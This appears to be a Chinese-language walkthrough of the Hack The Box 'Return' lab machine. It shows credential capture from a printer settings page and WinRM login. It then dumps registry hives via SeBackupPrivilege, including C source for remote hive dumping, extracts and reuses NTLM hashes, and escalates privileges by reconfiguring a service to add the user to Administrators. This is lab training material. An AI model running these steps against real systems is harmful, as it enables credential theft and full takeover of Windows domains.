HTB Return
Return
拿shell
先简单nmap看看开放了什么常用端口
# nmap 10.129.242.236
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl看到有http服务,上去看看,是一个打印机服务,有个设置,可以设置Server Address,Port,Username和Password
神奇的是,点击update,发包情况显示只发送了ip,其他三个参数压根没己的i
于是设置为自己的ip,然后开启监听看一下发了什么内容
#nc -lvnp 389
listening on [any] 389 ...
connect to [10.10.14.26] from (UNKNOWN) [10.129.242.236] 65481
0*`%return\svc-printer�
1edFg43012!!回显有点奇怪,但是明显能看出来svc-printer是账号,1edFg43012!!是密码
拿去探测下账户权限
#nxc winrm 10.129.242.236 -u svc-printer -p '1edFg43012!!'
WINRM 10.129.242.236 5985 PRINTER [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local)
WINRM 10.129.242.236 5985 PRINTER [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)可以winrm登录
提权
登录进去
#evil-winrm -i 10.129.242.236 -u svc-printer -p '1edFg43012!!'
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled权限挺多,这个靶机能用不同方式打,例如打SeBackupPrivilege
SeBackupPrivilege
直接dump SAM和SYSTEM 得到的本地账户hash,在域控上是无法登录的,因为本质上本地管理员账户在域控上是DSRM账户,默认不允许远程登录
这里有两个解决方案,一是拿到机器账户hash,二是修改注册表允许DSRM账户远程登录
首先是机器账户hash,需要dump SECURITY
而在dump SECURITY时,一般的reg save无法正常使用,可以选择其他工具作为代替
例如使用BackupOperatorToolkit,用法就是.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK
这里使用命令.\BackupOperatorToolkit.exe DUMP . printer
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> ./BOTK.exe DUMP . printer
DUMP MODE
[+] Connecting to registry hive
[+] hive: SAM
[+] Dumping hive to .
[+] Connecting to registry hive
[+] hive: SYSTEM
[+] Dumping hive to .
[+] Connecting to registry hive
[+] hive: SECURITY
[+] Dumping hive to .
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/22/2026 1:09 AM 28672 .SAM
-a---- 2/22/2026 1:09 AM 36864 .SECURITY
-a---- 2/22/2026 1:09 AM 16109568 .SYSTEM
-a---- 2/22/2026 1:08 AM 20992 BOTK.exe
-ar--- 2/21/2026 9:44 PM 34 user.txt下载下来然后本地解密
#impacket-secretsdump -sam sam -system system -security security LOCAL
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:a9851ac6ed45eca09e2e8b5de5faeecd7709e6ee0dda8d450560295a6d2a4a70f1c5896022559db741abf1c4f6f9142b14e32b3905d5e1c653ea32b5c99fc2711679ed77f36b7ca77192f9ed8910e2c531ac67c2c4d3f26df45f36c2cbc0654fd56295ca2e71362d523dd90917c3a4a9f3a897466646deb29ed222faefa5ac0ee2bb0a0ae9862a8bfc8291a9eaa08aace877275ac501d207ec028d6c177180753e8448f447c152b8f0fa38fea549baa724bdf871a541cabf830cba19117e3c3a0e524b1d715c88ade220bfefd5953696369cfc3c578b1514afda21a252aae2bd494b3bea5f53ff0ad2681878cef2e6a3
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:cee44f4fbf229a992689e1c18a5e6d86
[*] DPAPI_SYSTEM
dpapi_machinekey:0x06243ead9780ed8b9e36d34624aca3eff9eff2a0
dpapi_userkey:0x3dba4981ae9cb884001d7b0b3ffa5d3504fc12b8
[*] NL$KM
0000 16 BD CA 34 21 A5 5C AD 51 ED B1 7E 4A 4F 59 B8 ...4!.\.Q..~JOY.
0010 C3 65 1E 1A 5D 6D 97 82 79 3A 58 A0 FC 2B B5 8B .e..]m..y:X..+..
0020 A4 E2 9B CF DD 7B 52 80 99 33 45 4F F1 35 15 DC .....{R..3EO.5..
0030 4F 99 B3 A1 CB 55 21 A5 CC F5 27 43 F7 16 AA BC O....U!...'C....
NL$KM:16bdca3421a55cad51edb17e4a4f59b8c3651e1a5d6d9782793a58a0fc2bb58ba4e29bcfdd7b52809933454ff13515dc4f99b3a1cb5521a5ccf52743f716aabc
[*] Cleaning up... 网上有其他工具,例如BackupOperators.cpp
#include <stdio.h>
#include <Windows.h>
void MakeToken() {
HANDLE token;
const char username[] = "svc-printer";
const char password[] = "1edFg43012!!";
const char domain[] = "return.local";
if (LogonUserA(username, domain, password, LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_DEFAULT, &token) == 0) {
printf("LogonUserA: %d\n", GetLastError());
exit(0);
}
if (ImpersonateLoggedOnUser(token) == 0) {
printf("ImpersonateLoggedOnUser: %d\n", GetLastError());
exit(0);
}
}
int main()
{
HKEY hklm;
HKEY hkey;
DWORD result;
const char* hives[] = { "SAM","SYSTEM","SECURITY" };
const char* files[] = { "C:\\windows\\tasks\\sam.hive","C:\\windows\\tasks\\system.hive","C:\\windows\\tasks\\security.hive" };
//Uncomment if using alternate credentials.
//MakeToken();
result = RegConnectRegistryA("\\\\PRINTER", HKEY_LOCAL_MACHINE,&hklm);
if (result != 0) {
printf("RegConnectRegistryW: %d\n", result);
exit(0);
}
for (int i = 0; i < 3; i++) {
printf("Dumping %s hive to %s\n", hives[i], files[i]);
result = RegOpenKeyExA(hklm, hives[i], REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_READ, &hkey);
if (result != 0) {
printf("RegOpenKeyExA: %d\n", result);
exit(0);
}
result = RegSaveKeyA(hkey, files[i], NULL);
if (result != 0) {
printf("RegSaveKeyA: %d\n", result);
exit(0);
}
}
}也能用来dump
另一种则是修改注册表,依然可以使用BackupOperatorToolkit
*Evil-WinRM* PS C:\Users\svc-printer\Documents> ./BOTK.exe DSRM printer 2
DSRM MODE
[+] Opening target hive to write
[+] Setting DsrmAdminLogonBehavior value to 2看下效果
*Evil-WinRM* PS C:\Users\svc-printer\Documents> Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior"
DsrmAdminLogonBehavior : 2
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
PSChildName : Lsa
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry然后本地解密出本地账户的hash
└──╼ #impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up... winrm登录
#evil-winrm -i 10.129.242.236 -u 'PRINTER\Administrator' -H "34386a771aaca697f447754e4863d38a"不过要注意用户名是机器名/Administrator,不然会认为试图登录的是域管理员账户
Server Operators
还可以用Server Operators组权限来打
*Evil-WinRM* PS C:\Users\svc-printer\Documents> net user svc-printer
User name svc-printer
Full Name SVCPrinter
Comment Service Account for Printer
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/26/2021 12:15:13 AM
Password expires Never
Password changeable 5/27/2021 12:15:13 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/21/2026 10:15:05 PM
Logon hours allowed All
Local Group Memberships *Print Operators *Remote Management Use
*Server Operators
Global Group memberships *Domain Users可以看到账户svc-printer在Server Operators组下,而且Server Operators 组的成员可以启动、停止以及配置系统服务
我们可以直接写一个系统服务,将svc-printer加入到管理员组即可提权
sc.exe config VSS binPath= "cmd.exe /c net localgroup administrators svc-printer /add"
sc.exe stop VSS
sc.exe start VSS重新连接,然后查看组
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288发现已经在Administrators 组里了,直接读取flag即可
最后
其实感觉还能利用一下SeRestorePrivilege什么的来提权
这次学到了Server Operators和SeBackupPrivilege打法
许可协议:
CC BY 4.0